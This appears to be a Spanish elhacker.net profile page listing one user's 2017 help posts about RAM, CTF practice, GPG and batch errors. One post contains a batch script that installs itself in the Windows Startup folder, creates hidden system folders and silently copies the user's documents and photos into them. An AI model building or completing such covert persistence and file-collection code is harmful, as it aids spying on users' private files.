elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: [1]
1  Informática / Hardware / No puedo utilizar toda la memoria RAM instalada. en: 21 Noviembre 2017, 10:24 am
Tengo en mi portatil instalada 6gb de memoria ram y solo me deja usar 5gb. Pero el problema es que mi placa base soporta hasta 16gb y no se porque solo me reconoce 5.





No me reconoce la memoria RAM completa ni en Windows 10 ni en Ubuntu.


Si alguien me puede ayudar se lo agradeceria. Muchas gracias con antelación.
2  Seguridad Informática / Seguridad / CTF (Capture The Flag) Seguridad informatica en: 20 Noviembre 2017, 14:04 pm
Buenas. Alguien sabe como jugar a CTF? Me interesaria jugar a esto y no se donde puedo jugar. Empeze en una pagina en la cual habia que acceder a un servidor FTP pero cuando ya estaba casi entrando en el servidor resulta que se habia caido el servidor FTP y ya no funcionada porque era muy antiguo...

Busco algun lugar donde esten varios pruebas y alguna comunidad a la que unirme.

Si alguien sabe de algun lugar donde podria practicarlo que me lo diga por favor. Muchas gracias. ;-) ;-) ;-)
3  Sistemas Operativos / Windows / Error al quitar metadatos de archivos Windows 10 (Solucionado) en: 16 Noviembre 2017, 10:24 am
Buenas, estoy intentando quitar unos metadatos a unos archivos y me sale el siguiente error:
"La acción no se puede completar porque COM Surrogate tiene abierto el archivo."

Si alguien me puede ayudar se lo agraceceria.
Muchas gracias con antelación.
4  Seguridad Informática / Seguridad / GPG en: 15 Noviembre 2017, 20:30 pm
Buenas tengo una pregunta y me gustaria saber si alguien sabe responderla. Utilizo gpg y cuando cifro un archivo al descifrarlo no me pide contraseña ya que tengo la clave privada guardada en el mismo ordenador del que cifro. Me gustaria saber si hay alguna forma de que pida clave para descifrar en el mismo ordenador. Muchas gracias con antelación!!
5  Programación / Scripting / No se esperaba en este momento. Error [Batch] en: 2 Abril 2017, 10:58 am
Buenas. Tengo un problemilla con un batch. Quiero crear el siguiente batch pero me sale el error de "No se esperaba x en este momento".

Código:
cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
(
ECHO md 1
ECHO attrib +h +s 1
ECHO md 0
ECHO attrib +h +s 0
ECHO cd 0
ECHO IF NOT EXIST ".\"%USERNAME% MD ".\"%USERNAME%
ECHO attrib +h +s ".\"%USERNAME%
ECHO cd ".\"%USERNAME%
ECHO for /R %USERPROFILE%\Pictures\ %%x in (*.pdf,*.docx,*.xlsx,*.pptx,*.txt,*.jpg,*.jpeg) do copy %%x ".\"
)>"Inicio.bat"

Quiero crear un Batch que me genere ese batch pero no me lo genera y algunas veces cuando me lo genera es erroneo. ¿Alguien sabria decirme cual es el error.?

Muchas gracias de antelación.
6  Programación / Scripting / Comando Copy con: de archivo .bat en: 1 Abril 2017, 19:29 pm
Buenas. Quiero realizar un bacth el cual cree un archivo pero automáticamente. Me explico con un ejemplo:

Código
  1. cd C:\Users\Usuario\Desktop
  2. copy con: hola.txt
  3. hola soy un ejemplo
  4. ^Z


quiero realizar eso pero sin tener que pulsar Control+Z para que guarde el archivo ya que quiero que se cree eso de forma automática en un batch. ¿Alguien sabe como se podría hacer?


Gracias de antelación.


· Los códigos deben ir en etiquetas GeSHi
· Esto va en el subforo de scripting (movido)
>aquí las reglas del foro
-Engel Lex
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines